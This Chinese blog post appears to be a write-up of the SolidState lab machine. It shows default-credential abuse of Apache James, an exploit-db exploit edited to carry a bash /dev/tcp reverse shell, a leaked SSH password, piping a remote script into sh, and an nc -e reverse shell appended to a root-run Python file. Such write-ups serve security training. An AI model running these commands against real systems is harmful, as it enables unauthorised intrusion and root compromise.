SoliadState

Posted by on 2020年2月28日


SoliadState

nmap扫描全端口:
Openssh
SMTP
Apache httpd
Apache James POP
admin servers

ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.51 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -A 10.10.10.51

file

Google:apache james 2.3.2 exploit
exploit-db/35513
复制exp

file
file

如上的exp需要使用James Remote Administration的账号密码,默认是root/root,尝试使用登录,确认该服务使用的默认口令

nc 10.10.10.51 4555

file

修改exp中的payload

gedit 35513.py
payload = 'bash -i >& /dev/tcp/10.10.14.45/1234 0>&1'

file

使用James Remote Administration服务重置mindy密码为writeup

file

使用pop3查看邮件,找到了mindy用户的ssh密码
username: mindy
pass: P@55W0rd1!2@

telnet 10.10.10.51 110
user mindy
pass writeup
list
retr 1
retr 2

file

漏洞利用仅在有人登录时才起作用,执行exp:

python 35513.py 10.10.10.51

file

nc监听,登录ssh
username: mindy
pass: P@55W0rd1!2@
get mindy shell

nc -vlp 1234
ssh mindy@10.10.10.51
P@55W0rd1!2@

file
file

get user.txt

file

下载LinEnum: https://github.com/rebootuser/LinEnum

python -m SimpleHTTPSever 80

file

执行:

curl http://10.10.14.45/LinEnum.sh | sh

没有发现有趣的事情,下载:https://github.com/DominicBreuker/pspy

cd /tmp
wget http://10.10.14.45/pspy32
chmod +x pspy32
./pspy32

发现一个有趣的进程

file
file

get root shell

靶机:

echo "os.system('/bin/nc -e /bin/bash 10.10.14.45 7777')" >> /opt/tmp.py

file

kali:

nc -nlvp 7777

等待3分钟 get root shell

file

get root.txt

file




发表评论

电子邮件地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据